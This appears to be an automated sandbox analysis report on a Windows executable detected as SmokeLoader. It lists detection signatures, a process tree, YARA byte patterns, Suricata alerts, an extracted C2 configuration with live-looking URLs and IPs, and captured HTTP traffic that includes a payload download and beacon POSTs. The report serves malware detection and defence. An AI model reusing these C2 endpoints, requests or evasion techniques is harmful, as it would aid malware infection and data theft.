Edit tour

Windows Analysis Report
wBgwzVbZuV.exe

Overview

General Information

Sample name:	wBgwzVbZuV.exe renamed because original name is a hash value
Original sample name:	a50c051c3beb22a0f9ce8694fb4d0bab.exe
Analysis ID:	1531374
MD5:	a50c051c3beb22a0f9ce8694fb4d0bab
SHA1:	40f81c46df2c9da0157bc9a9270c9a171db284c9
SHA256:	1c17f70cfd875c4780045bf42e6fa42c98a23b51e7869774f6c388dde6c50f77
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wBgwzVbZuV.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\wBgwzVbZuV.exe" MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

F421.exe (PID: 5180 cmdline: C:\Users\user\AppData\Local\Temp\F421.exe MD5: 500B5F7BBE44E1C2370628C67AC45F67)

wehrbbi (PID: 5772 cmdline: C:\Users\user\AppData\Roaming\wehrbbi MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)

rghrbbi (PID: 3636 cmdline: C:\Users\user\AppData\Roaming\rghrbbi MD5: 500B5F7BBE44E1C2370628C67AC45F67)

wehrbbi (PID: 3960 cmdline: C:\Users\user\AppData\Roaming\wehrbbi MD5: A50C051C3BEB22A0F9CE8694FB4D0BAB)

rghrbbi (PID: 3900 cmdline: C:\Users\user\AppData\Roaming\rghrbbi MD5: 500B5F7BBE44E1C2370628C67AC45F67)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3879:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3765:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3765:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3661:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wehrbbi, CommandLine: C:\Users\user\AppData\Roaming\wehrbbi, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wehrbbi, NewProcessName: C:\Users\user\AppData\Roaming\wehrbbi, OriginalFileName: C:\Users\user\AppData\Roaming\wehrbbi, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wehrbbi, ProcessId: 5772, ProcessName: wehrbbi

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-11T06:37:27.331919+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50549	116.58.10.60	80	TCP
2024-10-11T06:37:28.608795+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50550	116.58.10.60	80	TCP
2024-10-11T06:37:29.867486+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50551	116.58.10.60	80	TCP
2024-10-11T06:37:31.120563+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50552	116.58.10.60	80	TCP
2024-10-11T06:37:32.627921+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50553	116.58.10.60	80	TCP
2024-10-11T06:37:33.887842+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50554	116.58.10.60	80	TCP
2024-10-11T06:37:35.170910+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50555	116.58.10.60	80	TCP
2024-10-11T06:37:36.456953+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50556	116.58.10.60	80	TCP
2024-10-11T06:37:37.720039+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50557	116.58.10.60	80	TCP
2024-10-11T06:37:39.029454+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50558	116.58.10.60	80	TCP
2024-10-11T06:37:40.279368+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50559	116.58.10.60	80	TCP
2024-10-11T06:37:41.538479+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50560	116.58.10.60	80	TCP
2024-10-11T06:37:42.807815+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50561	116.58.10.60	80	TCP
2024-10-11T06:37:44.079413+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50562	116.58.10.60	80	TCP
2024-10-11T06:37:45.349627+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50563	116.58.10.60	80	TCP
2024-10-11T06:37:46.644516+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50564	116.58.10.60	80	TCP
2024-10-11T06:37:47.887306+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50565	116.58.10.60	80	TCP
2024-10-11T06:37:49.178180+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50566	116.58.10.60	80	TCP
2024-10-11T06:37:50.445145+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50567	116.58.10.60	80	TCP
2024-10-11T06:37:51.737702+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50568	116.58.10.60	80	TCP
2024-10-11T06:37:53.006273+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50569	116.58.10.60	80	TCP
2024-10-11T06:37:54.248895+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50570	116.58.10.60	80	TCP
2024-10-11T06:37:55.768968+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50571	116.58.10.60	80	TCP
2024-10-11T06:37:57.008913+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50573	116.58.10.60	80	TCP
2024-10-11T06:38:00.041549+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50581	116.58.10.60	80	TCP
2024-10-11T06:38:01.304385+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50592	116.58.10.60	80	TCP
2024-10-11T06:38:02.605345+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50598	116.58.10.60	80	TCP
2024-10-11T06:38:03.860532+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50609	116.58.10.60	80	TCP
2024-10-11T06:38:05.389156+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50615	116.58.10.60	80	TCP
2024-10-11T06:38:06.633083+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50626	116.58.10.60	80	TCP
2024-10-11T06:38:07.949302+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50636	116.58.10.60	80	TCP
2024-10-11T06:38:09.233415+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50643	116.58.10.60	80	TCP
2024-10-11T06:38:10.505968+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50654	116.58.10.60	80	TCP
2024-10-11T06:38:12.057886+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50664	116.58.10.60	80	TCP
2024-10-11T06:39:21.577978+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50850	116.58.10.60	80	TCP
2024-10-11T06:39:28.718450+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50851	116.58.10.60	80	TCP
2024-10-11T06:39:36.316985+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50852	116.58.10.60	80	TCP
2024-10-11T06:39:44.999341+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50853	116.58.10.60	80	TCP
2024-10-11T06:39:55.431116+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50854	116.58.10.60	80	TCP
2024-10-11T06:40:08.776918+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50855	186.233.231.45	80	TCP
2024-10-11T06:40:21.583692+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50856	186.233.231.45	80	TCP
2024-10-11T06:40:33.594959+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50857	186.233.231.45	80	TCP
2024-10-11T06:40:47.322863+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50858	186.233.231.45	80	TCP
2024-10-11T06:40:59.977004+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50859	186.233.231.45	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wehrbbi

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: wBgwzVbZuV.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F421.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wehrbbi	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rghrbbi	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wBgwzVbZuV.exe

Joe Sandbox ML: detected

Source: wBgwzVbZuV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:50575 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50549 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50565 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50561 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50555 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50566 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50550 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50554 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50568 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50564 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50556 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50562 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50570 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50560 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50551 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50558 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50581 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50609 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50563 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50573 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50553 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50592 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50567 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50598 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50571 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50636 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50552 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50654 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50615 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50559 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50557 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50643 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50626 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50664 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50569 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50850 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50852 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50851 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50854 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50857 -> 186.233.231.45:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50856 -> 186.233.231.45:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50858 -> 186.233.231.45:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50859 -> 186.233.231.45:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50855 -> 186.233.231.45:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50853 -> 116.58.10.60:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 186.233.231.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 116.58.10.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://ninjahallnews.com/search.php
Source: Malware configuration extractor	URLs: https://fallhandbat.com/search.php

Source: Joe Sandbox View

IP Address: 23.145.40.164 23.145.40.164

Source: Joe Sandbox View	ASN Name: SolucaoNetworkProvedorLtdaBR SolucaoNetworkProvedorLtdaBR
Source: Joe Sandbox View	ASN Name: NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

Source: Joe Sandbox View

JA3 fingerprint: 72a589da586844d7f0818ce684948eea

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fxxmebwwqsmoglpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwmajrkjinpjtb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vdgnwysksin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mnxigvfksbogudg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kixruudymeg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://noqnaadfmcqiqh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xgcqobnogyn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkdovmgcqkpkau.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jdcljhdxiwgilrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ktpfbekvdosn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://egphyymsnbbon.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aedejmbyprcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hvawqwmqdyhhbuvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pmvtliwpktklau.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://faxctnknnkusgdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
